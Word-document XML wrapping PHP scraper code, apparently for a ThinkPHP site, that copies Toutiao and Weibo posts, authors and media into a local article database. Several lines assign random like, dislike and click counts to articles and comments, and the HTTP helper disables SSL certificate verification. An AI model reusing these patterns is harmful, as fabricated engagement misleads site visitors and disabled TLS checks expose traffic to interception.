    <w:p w14:paraId="49026C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跳过重复：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>".$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D146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1343F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8639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85904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if(!empty($v['user_id'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A17E9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$uid=Db::name('member')-&gt;where(['toutiao_uid'=&gt;$v['user_id']])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0253A2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5DA07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$userInfo=$this-&gt;user_info($v['user_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701C62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$userData['toutiao_uid']=$userInfo['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BED1F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$userData['img']=$this-&gt;qiniu($userInfo['img']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D1A1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$userData['nickname']=$userInfo['name'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F32F5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40FE69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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2367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5275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$data['uid']=$uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7268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61AD9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".$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0A9D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554109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B0925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if(empty($v['user'])) continue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E949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$uid=Db::name('member')-&gt;where(['toutiao_uid'=&gt;$v['user']['id']])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B49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23333B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$userInfo=$v['user'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8FAF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$userData['toutiao_uid']=$userInfo['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46479E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$userData['img']=$this-&gt;qiniu($userInfo['image']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4486A6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$userData['nickname']=$userInfo['nickname'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBD81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0D0C8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3559BE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EF3E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if($v['mychannel']==1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B36C4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if(empty($v['content'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2128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"content</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文章模式详细内容不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>".$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061F81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01C81C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75036E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          =           $this-&gt;qiniu($v['image']); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC551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$v['content'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCFB7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if($v['mychannel']==2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC54B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DED8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($v['images'] as $ka =&gt; $va) {   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D19C9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$img=$this-&gt;qiniu($va);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0162F8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$images[]=$img;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CED1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if($k==1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E25E7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$where['image']=$img;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3C41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ACAB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2DB4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$data['images']=json_encode($images);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607B3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$data['images']=str_replace('"','&amp;quot;',$data['images']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D5C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if($v['mychannel']==3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320A3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if(!$v['video']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2CE9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视频地址不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>".$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0718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27461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8ECA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$data['video']=$this-&gt;qiniu($v['video'],'.mp4');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C03E8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$data['image']=$this-&gt;qiniu($v['image']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF9B4C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9851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$v['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4881C2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$v['description'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3519DB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$v['create_time'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C06B8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$data['update_time']        =           $v['update_time'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68ED9C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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9880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$data['des']                =           50;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7F32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          =           $v['mychannel'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D1EB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$data['toutiao_tiemId']     =           $v['item_id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254DA7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$data['weitoutiao']         =           1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F236E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          =           $v['mychannel'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D59B1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$data['typeid']='0';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F671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$id=Db::name('article')-&gt;insertGetId($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5F2D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'id:'.$v['item_id'].($data['title'] ? $data['title'] : $data['description'])."[</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发布成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]&lt;br /&gt;\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3766FC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$this-&gt;toutiao_ping($id,$v['item_id'],$v['item_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EC6B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CE227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B0545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weibo(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644F1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Request::instance();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488E66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$url="weibo";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A06C7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$html=$this-&gt;get($url,true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112FD1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 return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729124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4524D5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311492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"&lt;br /&gt;\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3D35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if(!empty($v['title'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304D16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$titles=Db::name("article")-&gt;where(['title'=&gt;$v['title']])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18682C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if($titles){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8859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跳过重复：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>".$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDD4D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30F2F9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45C45B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EBD0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if(!empty($v['user_id'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BACA5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$uid=Db::name('member')-&gt;where(['toutiao_uid'=&gt;$v['user_id']])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294DC9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282D52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$userInfo=$v['user'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB61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$userData['toutiao_uid']=$v['user_id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0BB9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$userData['img']=$this-&gt;qiniu($userInfo['img']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E7EC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$userData['nickname']=$userInfo['nickname'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365B32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63B93A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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5408A0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0E7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$data['uid']=$uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47234E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093CC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".$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31236C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370330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617F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if($v['mychannel']==1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07613C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if(empty($v['description'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384AA4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"content</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文章模式详细内容不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>".$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A14F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21607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0CAF4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$v['description'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0F99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if($v['mychannel']==2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7797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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF717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($v['images'] as $ka =&gt; $va) {   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354459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$img=$this-&gt;qiniu($va);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3AC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$images[]=$img;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C92C8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if($k==1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06343F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$data['image']=$img;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D83BB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CF88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A88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$data['images']=json_encode($images);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E4B3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$data['images']=str_replace('"','&amp;quot;',$data['images']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CFC6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if($v['mychannel']==3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF583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if(!$v['video']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCB67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视频地址不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>".$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455975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13FC42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F8A54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$data['video']=$this-&gt;qiniu($v['video'],'.mp4');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DE82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$data['image']=$this-&gt;qiniu($v['image']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3AAD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1C1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!empty($v['title']) ? $v['title'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D57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$v['description'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A37F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$v['create_time'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466C3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$data['update_time']        =           $v['update_time'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418E0A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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012A01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                =           50;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43969C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          =           $v['mychannel'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FD03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$data['toutiao_tiemId']     =           $v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6FD6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$data['weitoutiao']         =           1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097FF2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          =           $v['mychannel'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C85DE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$data['typeid']='0';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B101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$id=Db::name('article')-&gt;insertGetId($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F96A2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'id:'.$id.$data['title'] ? $data['title'] : $data['description']."[</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发布成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F314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$this-&gt;weibo_ping($id,$v['id'],$v['id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6866B4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2FA3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91E9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weibo_ping($aid='',$id='',$mid=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC61B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$count=rand(1,10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74238B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 || !$mid || !$aid){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B496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p>
    <w:p w14:paraId="34F3C3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B21B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$url='weibo/ping/id/'.$id.'/mid/'.$mid.'/count/'.$count;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CE05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$html=$this-&gt;get($url,true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB235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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BF5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21B0DE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6288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$i=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7425C8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687C71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$where['content']=$v['text'];           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090E0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$where['zan']=rand(1,999);           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6682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$where['time']=$v['create_time'];       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AF5C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$where['aid']=$aid;                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67748D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$where['zan']=rand(20,229);             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6262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$uid=Db::name('member')-&gt;where(['toutiao_uid'=&gt;$v['user_id']])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4275CC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3C2237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$userInfo=$v['user'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A82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$userData['toutiao_uid']=$v['user_id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D7F3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$userData['img']=$this-&gt;qiniu($userInfo['img']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9F9A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$userData['nickname']=$userInfo['nickname'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5906C6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740BE8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DD40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EF0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$where['uid']=$uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654653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$a=Db::name('article_ping')-&gt;insertGetId($where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55ED20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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FF9F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9C73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09D6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7D2D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Db::name('article')-&gt;where('id',$aid)-&gt;update(['pingNum'=&gt;$i,'zan'=&gt;rand(0,300),'cai'=&gt;rand(0,50),'click'=&gt;rand(1,9999)]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27577B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224AD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redian(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342788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"toutiao/redian";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA23D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$this-&gt;get($url,true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0E66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if(!$html){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2576CA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无热点数据</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59462A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E83D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$tiao = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F81B0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($html as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4D29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if($tiao &gt; 1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344DBB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51ACC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03007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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8D4B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"&lt;br /&gt;\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5095A2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if(!empty($v['title'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177963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if($v['dtitle']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E8BA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$titles=Db::name("article")-&gt;where('title',$v['title'])-&gt;whereOr('dtitle',$v['dtitle'])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493EC9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8B98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$titles=Db::name("article")-&gt;where('title',$v['title'])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50339B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EE9B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if($titles){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC371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跳过重复：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>".$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D6B9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56A79D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607F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C1A7F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标题不能为空：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>".$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9457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68FF88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1FCF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if(!empty($v['user']['id'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156548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$uid=Db::name('member')-&gt;where(['toutiao_uid'=&gt;$v['user']['id']])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6998C1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2439FE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$userInfo=$v['user'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEEF1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$userData['toutiao_uid']=$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB0CF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$userData['img']=$this-&gt;qiniu($userInfo['image']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5605A6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$userData['nickname']=$userInfo['nickname'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C42F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$userData['qianming']=$userInfo['qianming'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E654C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$uid=$this-&gt;user($userData); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F271A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A400C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$data['uid'] = $uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46302D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13BA7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用户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>".$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28900A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38F666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CD5D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if(!empty($v['image'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647984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          =           $this-&gt;qiniu($v['image']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CA51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A7DF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if($v['mychannel']==1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433311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if(empty($v['content'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1931F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"content</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文章模式详细内容不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>".$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCDE2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4E72AA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200EAB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        =           $v['content'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC4D6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if($v['mychannel']==2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337468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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E0A7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($v['images'] as $ka =&gt; $va) {   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7D9D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$img=$this-&gt;qiniu($va);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0431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$images[]=$img;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE047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if($k==1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60258D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$data['image']=$img;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAF07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B62A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79C0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$data['images']=json_encode($images);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DF6E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$data['images']=str_replace('"','&amp;quot;',$data['images']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAA7C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if($v['mychannel']==3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7BCA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if(empty($v['video'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41241C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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>视频地址不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>".$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217545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continue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF23E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452B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$data['video']=$this-&gt;qiniu($v['video'],'.mp4');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB43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DE0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$data['title']              =           $v['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7411B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$data['dtitle']             =           $v['dtitle'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6705E3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$data['description']        =           $v['description'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F85F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$data['create_time']        =           $v['time'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6C48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$data['update_time']        =           $v['time'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B147D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$data['hide']               =           1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C16D7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$data['des']                =           50;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536460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$data['mychannel']          =           $v['mychannel'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC3BF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$data['toutiao_tiemId']     =           $v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9A94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$data['weitoutiao']         =           0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214C0B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$data['flags']              =           2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D58F4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if(!empty($v['typeid'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A54F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 = $this-&gt;catename($v['typeid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58ED04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7DFAA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$data['typeid']='news';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8EC8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52A02B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if($v['mychannel'] == 3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A13B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$data['video'] = $this-&gt;qiniu($v['video'],'.mp4');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756B5E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14E9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$id=Db::name('article')-&gt;insertGetId($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445C47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'id:'.$id.$data['dtitle'] ? $data['dtitle'] : $data['title']."[</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发布成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2331F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$this-&gt;toutiao_ping($id,$v['id'],$v['id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F502B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$tiao ++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AF85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5A7B6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0E74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typeid($name='news_edu'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B972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if(!$name){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62188A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629378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7FE6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'toutiao/category';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB60F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$html = $this-&gt;get($url,true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328EA8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if(!empty($html['data']) &amp;&amp; count($html['data']['data'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E904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$html['data']['data'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775FA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B37C8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160282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43F2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C2D6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html($url,$method='GET',$body=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A266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config()['apicloud'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1855B6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$now = time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B491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$httpheader = array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D78D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"X-APICloud-AppId: ".$config['appid'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC29A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"X-APICloud-AppKey: ".sha1($config['appid']."UZ".$config['appkey']."UZ".$now).".".$now</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B76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5744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$curl=curl_init();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F40B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CURLOPT_URL, $url); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057A6F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CURLOPT_CUSTOMREQUEST, $method);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4503D5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CURLOPT_HTTPHEADER , array("X-HTTP-Method-Override: $method"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F24C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CURLOPT_HTTPHEADER , $httpheader);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02205D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CURLOPT_SSL_VERIFYPEER, 0); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAA55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CURLOPT_SSL_VERIFYHOST, 0); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AF7E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CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0296D8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CURLOPT_AUTOREFERER, 1); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEBCC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CURLOPT_POSTFIELDS, $body); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441BEE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CURLOPT_TIMEOUT, 30); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA7C6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CURLOPT_HEADER, 0); </w:t>
      </w:r>
    </w:p>
